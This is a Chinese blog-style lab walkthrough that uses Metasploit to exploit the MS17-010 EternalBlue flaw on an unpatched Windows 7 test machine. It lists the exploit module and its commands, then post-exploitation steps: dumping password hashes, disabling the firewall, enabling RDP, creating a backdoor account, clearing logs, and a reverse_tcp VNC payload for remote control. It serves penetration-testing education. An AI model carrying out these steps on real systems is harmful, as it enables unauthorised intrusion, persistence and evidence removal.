kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

前言:

提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

实验环境:

工具:metasploit

靶机两台:windows 7sp1和kali2020

攻击机IP地址:192.168.29.131

被攻击机IP地址:192.168.29.128

实验条件:两台机子可以互通的,并且windows 7sp1(无补丁)开启了445端口,防火墙是关闭的。
 

步骤:

1、在kali里面打开metasploit漏洞利用框架

2、搜索ms17-010漏洞利用模块 search 17-010

找到exploit/windows/smb/ms17_010_eternalblue

其中exploit具有攻击性,auxliary是用来验证的。

3、使用利用模块use+exploit/windows/smb/ms17_010_eternalblue

4、查看配置项 show options

5、设置 靶机IP地址(RHOST),攻击机IP地址(LHOST)

再次查看配置项

6、实施攻击exploit/run

7、攻入目标主机

Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

 

在攻击进去的情况下演示几个功能

1、查看目标主机的操作系统信息(sysinfo)

2、对目标主机的屏幕进行截图(截图保存在/root下)

3、查看目标主机所有的用户名和密码(密码显示为hash值)

4获取shell页面

乱码解决方法:

输入chcp 65001可将乱码解决

5、关闭防火墙

6、关闭Telnet服务

7、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况

1)方法1:run  getgui  -e

(2)方法2:run post/windows/manage/enable_rdp

到windows7sp1上查看远程桌面功能启用情况

8、创建系统用户(创建用户名为:test,密码为:123456)

9、清除日志

 

使用VNC payload远程操控目标电脑

1,输入Background,返回退出meterpreter界面

2,查看set payload 参数(输入set payload 按两下 TAB键 )

找到windows/x64/vncinject/reverse_tcp,复制黏贴

3,set payload windows/x64/vncinject/reverse_tcp

4,set viewonly no

5,exploit

成功获取控制权

 

 

  • 13
    点赞
  • 94
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值